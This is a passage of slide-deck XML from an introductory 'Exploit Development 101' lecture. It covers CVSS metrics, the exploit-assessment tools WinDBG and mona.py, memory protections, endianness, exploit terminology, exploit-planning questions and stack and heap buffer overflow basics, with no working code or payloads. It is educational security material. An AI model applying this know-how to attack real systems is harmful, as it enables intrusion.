            <a:pPr indent="-228600" lvl="1" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>is a WinDBG extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reports what is definately exploitable, probably exploitable, not exploitable, and unknown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>but is considered not very accurate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>mona.py has an exploit generation feature that is useful for getting started</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rt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Vulnerability Scoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Shape 291"/>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lang="en"/>
              <a:t>Common Vulnerability Scoring System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.first.org/cvss#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>Six Base metrics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.first.org/cvss/faq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Access Vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: how well can a remote attack attack the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Access Complexity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the complexity of the attack required to exploit the vuln, once he has gained access to the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Authentication: Measures the number of times an attacker must authenticate to the target system, in order to exploit the vuln</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Confidentiality Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the damage to confidentiality if the vulnerability is successfully exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Availability Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the damage to availability if the vulnerability is successfully exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Integrity Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the damage to the integrity of data and systems if the vulnerability is successfully exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>There are also Temporal, and Environmental metrics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability Scoring is important for prioritizing incident response, and for system administrators to  prioritize proactive security measures </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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2266576"/>
            <a:ext cx="6400800" cy="1333800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploit Development 101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Shape 297"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3600451"/>
            <a:ext cx="6400800" cy="900600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </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Foreword</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Shape 303"/>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indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Most of the initial techniques taught in this lecture will not work on modern systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>b/c of ASLR, DEP, Stack Cookies, Safe SEH, SEHOP, and etc...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>It is necessary to teach from the beginning though, to see why these countermeasures came into play</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>We will get into bypassing these countermeasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>*But for now, the term </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>VANILLA SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> means a system without any of these countermeasures active.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>The HAOE book's cd is a nice vanilla system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>great for learning</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Foreword continued...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Shape 309"/>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indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400" u="sng"/>
              <a:t>NOTE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400" u="sng"/>
              <a:t>Exploits must be developed with the architecture in mind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>Intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>architecture is little endian:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mnemonic tip:   Intel has more characters in common with    "little" than big</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>ie: 0xAABBCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng"/>
              <a:t>DD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> gets stored in memory as: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>	\x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng"/>
              <a:t>DD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> \xCC \xBB \xAA  </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>(little end first)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Most other processors are big-endian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>ie: 0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng"/>
              <a:t>AA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>BBCCDD gets stored in memory as: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>	\x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng"/>
              <a:t>AA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> \xBB \xCC \xDD  </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>(big end first)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400" u="sng"/>
              <a:t>Some processors now are bi-endian (i.e. ARM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>We will start with the most common vulnerable bug: the buffer overflow bug.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lv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Definitions, Terminology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Shape 315"/>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indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>(v.) - To take advantage of a vulnerability so that the target system reacts in a manner other than which the designer intended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>(n.) - The tool, set of instructions, or code that is used to take advantage of a vulnerability.  AKA Proof of Concept (POC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>0day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>(n.) - An exploit for a vulnerability that has not been publicly disclosed.  Sometimes used to refer to the vulnerability itself (i.e. hear about that Java 0day?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>Shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>(n.) - a set of instructions injected and then executed by an exploited program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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Exploit Planning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Shape 321"/>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indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>After you've discovered a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>What type of attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>make sense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Stack overflow? Stack randomized??  is the Stack Executable?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Canaries?  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Other protection mechanisms (more on this later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>How much space do we have?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Insert code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Redirect execution?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>return to lib c?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>or other executable regions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>perhaps writable and executable???</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Buffer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Shape 327"/>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indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Quite simple.  Occurs in C/C++ code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Overflows happen when too much stuff in too small a space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>i.e. "Hello World\0" being stored in </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>char buf[6]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>"World\0" is written into adjacent memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>2 categories of overflows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Stack Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Heap Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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Linux process memory layout (windows differs!)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Shape 333"/>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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Program scratch space </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>local (scoped) variables, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
